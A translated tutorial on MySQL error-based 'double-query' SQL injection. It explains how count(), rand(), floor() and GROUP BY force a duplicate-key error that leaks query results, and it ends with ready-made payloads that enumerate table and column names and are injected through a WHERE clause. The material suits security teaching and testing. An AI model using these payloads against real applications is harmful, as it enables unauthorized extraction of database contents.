Dual-query Injection

Source: Internet
Author: User

In the previous article (http://www.bkjia.com/Article/201302/190763.html) I said that double-query injection is hard to explain clearly. This time I will try: I have read up on the underlying principle and will go through it step by step so that everyone can follow.

First, the keyword behind every query is SELECT, which everyone knows. A subquery is simply a SELECT statement nested inside another SELECT statement; the inner SELECT is the subquery.

Let's look at a simple example:

SELECT concat((SELECT database()));

When this runs, the subquery is executed first: SELECT database() returns the name of the current database, and that result is passed to concat(). concat() joins strings together; concat('A', 'B'), for example, returns AB.

Principle: to understand double-query injection you need four functions/clauses:

1. rand() // random number function
2. floor() // rounds down to an integer
3. count() // aggregate function
4. GROUP BY // grouping clause

The observation behind the technique is that when an aggregate function such as count() is combined with a GROUP BY on a key that contains rand(), MySQL raises an error, and the error message echoes the conflicting group key, so whatever you put into that key is leaked back to you.

Take a local database named security as an example. First connect to the server with mysql -u root -p and enter the password (toor here) when prompted.

Then switch to the security database with use security; a single server may host several databases.

 


Now run the simple subquery from above, SELECT concat((SELECT database())); it displays security, the name of the current database. Next, test concat() on its own: SELECT concat('string1', 'string2');

As expected, the result is string1string2.


Now let's see what the random function rand() does. Run SELECT rand(); several times.

Each call returns a different floating-point number greater than or equal to 0 and less than 1. Then look at the rounding function: SELECT floor(1.1123456);

 


floor() returns the largest integer less than or equal to its argument, so this gives 1.

 

Now let's look at the simplest building block of a double-query injection. As in my previous article, the subquery is SELECT floor(rand()*2). rand() returns a decimal greater than or equal to 0 and less than 1; multiplied by 2 it is greater than or equal to 0 and less than 2, and floor() of that can only be 0 or 1. So the result of this query is either 0 or 1, nothing else. Now a slightly harder one: SELECT concat((SELECT database()), floor(rand()*2)); Don't be put off. Look at the inner SELECT database() first: it returns the database name, here security. floor(rand()*2), as shown above, is either 0 or 1. concat() joins the two, so the result is either security0 or security1.


If we append FROM table_name to that statement, we get one row of security0 or security1 per row in the table: the number of rows is decided by the table. A table with five administrators would give five rows. Here the users table has 13 users, so 13 rows come back.

With FROM information_schema.schemata, which lists every database on the server, three rows come back because this machine has three databases.

Now we add the GROUP BY clause.
We query information_schema.tables or information_schema.columns because they hold a lot of rows, so many random values are generated and they will not all be security0; a mix of both values is exactly what the technique needs.


SELECT concat((SELECT database()), floor(rand()*2)) AS a FROM information_schema.tables GROUP BY a;

Explanation: we give the result of concat((SELECT database()), floor(rand()*2)) the alias a and group by it. All the security0 rows fall into one group and all the security1 rows into another, leaving two result rows.

Note that database() here can be replaced with any function or query whose result you want, such as version(), user(), @@datadir, or a subquery that reads table names or column names. The principle is the same.

Now the highlight. Add the aggregate function count(*) to the statement:

SELECT count(*), concat((SELECT database()), floor(rand()*2)) AS a FROM information_schema.tables GROUP BY a;

It fails with an error:

ERROR 1062 (23000): Duplicate entry 'security1' for key 'group_key'

Duplicate key value, and security, the result of our subquery, is printed inside the error message. The error arises because MySQL evaluates the group key twice for a row that starts a new group: once to look the key up in its temporary table and again when it inserts the row. When rand() returns a different value on those two evaluations, the inserted key can collide with one that already exists. Because rand() is unseeded here, the collision does not happen on every run; if the query returns a normal result set, simply run it again.

To read the version instead, replace database() with version():

SELECT count(*), concat((SELECT version()), floor(rand()*2)) AS a FROM information_schema.tables GROUP BY a;


Let's look at another one:

SELECT count(*), concat('~', (SELECT user()), '~', floor(rand()*2)) AS a FROM information_schema.tables GROUP BY a;
ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

The ~ characters are only there to make the leaked value easier to spot in the error text. There is also a more involved form, called a derived table: the grouping query is wrapped in a subquery and given a table alias, so the whole thing becomes a single value that can be placed inside another query:

SELECT 1 FROM (SELECT count(*), concat('~', (SELECT user()), '~', floor(rand()*2)) AS a FROM information_schema.tables GROUP BY a) x;

This raises the same error. For its use in an actual injection point, refer to my previous article. I believe the principle is now clear.
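The following is an added worked example, not code from the original article. It collects the error-based queries above into one sequence and goes a little beyond them: it seeds rand() so the error fires on every run, walks table and column names one at a time with LIMIT, and shows the derived-table form sitting inside a WHERE clause. The security database and users table come from the text; the vulnerable statement SELECT * FROM users WHERE id = <id> and its id parameter are assumptions made for illustration.

```sql
-- Added example, not from the original article. Assumes a MySQL server with the
-- `security` database described in the text; the `id` parameter and the
-- vulnerable statement in step 3 are hypothetical.

-- 1. Why unseeded rand() is unreliable: the group key is evaluated twice for a
--    row that opens a new group (once to look it up in the GROUP BY temporary
--    table, once when the row is inserted), so the duplicate only appears when
--    those two evaluations disagree. Seeding with rand(0) makes the sequence
--    fixed; its first three values floor to 0, 1, 1, which is enough to force
--    the collision on any table with three or more rows.
SELECT count(*), concat('~', (SELECT database()), '~', floor(rand(0)*2)) AS a
FROM information_schema.tables
GROUP BY a;

-- 2. Only one group key fits in the error message, so multi-row results are read
--    one row at a time with LIMIT n,1. Here: the n-th table name in the current
--    database. Increase the offset (LIMIT 1,1; LIMIT 2,1; ...) to read the next.
SELECT count(*), concat('~',
    (SELECT table_name FROM information_schema.tables
     WHERE table_schema = database() LIMIT 0,1),
    '~', floor(rand(0)*2)) AS a
FROM information_schema.tables
GROUP BY a;

-- 3. Derived-table form inside a WHERE clause. Hypothetical vulnerable query:
--      SELECT * FROM users WHERE id = <id>
--    With id = 1 AND (SELECT 1 FROM (...) x) the SQL the server runs becomes
--    the statement below; the inner GROUP BY fails first, and the leaked value
--    travels back in the 1062 error.
SELECT * FROM users WHERE id = 1 AND (
  SELECT 1 FROM (
    SELECT count(*), concat('~', (SELECT user()), '~', floor(rand(0)*2)) AS a
    FROM information_schema.tables
    GROUP BY a
  ) x
);

-- 4. Same pattern for columns once a table name is known from step 2
--    (the `users` table from the text is used here).
SELECT count(*), concat('~',
    (SELECT column_name FROM information_schema.columns
     WHERE table_schema = database() AND table_name = 'users' LIMIT 0,1),
    '~', floor(rand(0)*2)) AS a
FROM information_schema.tables
GROUP BY a;
```

Each statement is meant to be run in the mysql client against the security database. With rand(0) every one of them ends in the same ERROR 1062 Duplicate entry shown earlier, with the leaked value sitting between the two ~ markers; with unseeded rand() the same queries only fail on some runs, which is why the seeded form is the one normally used in payloads.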
